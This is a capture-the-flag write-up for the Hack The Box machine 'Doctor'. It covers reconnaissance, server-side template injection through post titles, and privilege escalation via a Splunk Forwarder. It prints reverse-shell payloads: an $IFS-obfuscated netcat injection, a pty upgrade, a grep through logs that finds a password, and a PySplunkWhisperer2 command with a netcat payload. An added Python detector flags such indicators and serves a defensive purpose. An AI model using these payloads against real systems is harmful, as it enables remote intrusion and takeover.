Hack The Box is an online platform to test and advance your skills in penetration testing and cyber security.
Reconnaissance
Service enumeration with Nmap (TCP scan on all ports with version detection and scripts):
A domain name “doctors.htb” was found on the web application hosted on the “http://10.10.10.209” address:
No web server was accessible on “http://doctors.htb” so the file “/etc/hosts” had to be edited to resolve the domain to the “10.10.10.209” IP address:
10.10.10.209 doctors.htb
The application allowed the users to create new posts which were visible on the main page.
Inspecting the HTML source code led to the “http://doctors.htb/archive” page, which revealed an XML output. The title of the previously created post was visible without sanitization inside the “<title>” elements. It was suspected that the application was vulnerable to Server Side Template Injection: an attacker might be able to insert a malicious payload into the template, which is then executed on the server side.
Exploitation
After several attempts, it was determined that the server was hosting a binary of Netcat Traditional.
Launching Netcat reverse shell on the targeted host:
nc.traditional -e /bin/sh [IPADDR] [PORT]
Opening a Netcat listener on the attacker’s host:
nc -nlvp [PORT]
After the template engine in use was determined (the identification step of Server Side Template Injection attacks), the following payload had to be injected as the content of a new post:
<img src=http://10.10.14.84/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.84'$IFS'4444')>
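The payload above replaces every space with the shell's $IFS variable, which is why it contains no whitespace at all. The following is an added detection example, not part of the original writeup: it normalizes $IFS back to spaces and flags the indicators a reviewer would look for in user-submitted post content (command substitution, template delimiters, a netcat call that hands over a shell). The sample submissions are constructed, and 203.0.113.0/24 is a documentation address range.

```python
import re

# Patterns that do not belong in user-controlled fields such as a post title or body.
IFS_RE = re.compile(r"\$\{?IFS\}?")                       # $IFS / ${IFS} used instead of spaces
SUBST_RE = re.compile(r"\$\([^)]*\)|`[^`]*`")             # $(...) or `...` command substitution
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)   # template delimiters in plain content
SHELL_RE = re.compile(
    r"\b(?:nc|ncat|netcat)(?:\.traditional)?\b[^)`]*-e\s+/bin/(?:ba)?sh"
)                                                         # netcat asked to execute a shell

def normalize(value: str) -> str:
    """Replace the $IFS whitespace substitute so the later patterns see real spaces."""
    return IFS_RE.sub(" ", value)

def analyze(value: str) -> list[str]:
    """Return the indicators found in one submitted field, in a fixed order."""
    findings = []
    if IFS_RE.search(value):
        findings.append("ifs_obfuscation")
    plain = normalize(value)
    if SUBST_RE.search(plain):
        findings.append("command_substitution")
    if TEMPLATE_RE.search(plain):
        findings.append("template_expression")
    if SHELL_RE.search(plain):
        findings.append("shell_invocation")
    return findings

# Constructed sample submissions (not captured traffic).
SAMPLES = {
    "benign": "Hello doctors, my first post",
    "ifs_payload": "<img src=http://203.0.113.5/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'203.0.113.5'$IFS'4444')>",
    "template": "My title is {{ title }} today",
}

def scan(samples: dict[str, str]) -> dict[str, list[str]]:
    """Analyze every sample and keep only those that raised at least one indicator."""
    return {name: hits for name, value in samples.items() if (hits := analyze(value))}

if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

Run over the application's stored posts or its request log, a single hit on any of these indicators is worth an alert, since legitimate post content never needs them.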
After the reverse shell was established, an interactive shell was spawned with Python as the “web@doctor” user:
python3 -c 'import pty;pty.spawn("/bin/bash")'
After user enumeration, the current user turned out to be a member of the “adm” group, which is responsible for monitoring tasks and therefore has read access to the log files. A quick search for sensitive information revealed a password in a log file:
grep -R -e 'password' /var/log/
Identified password: Guitar123
Identified user: shaun
Switching to user “shaun” by using the discovered password “Guitar123”:
su shaun
Privilege Escalation
The target was running a vulnerable version of a Splunk Forwarder instance on port 8089. A quick search revealed an exploit, Splunk Whisperer2, which could be used to obtain a root shell:
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.84 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.84' '4443'"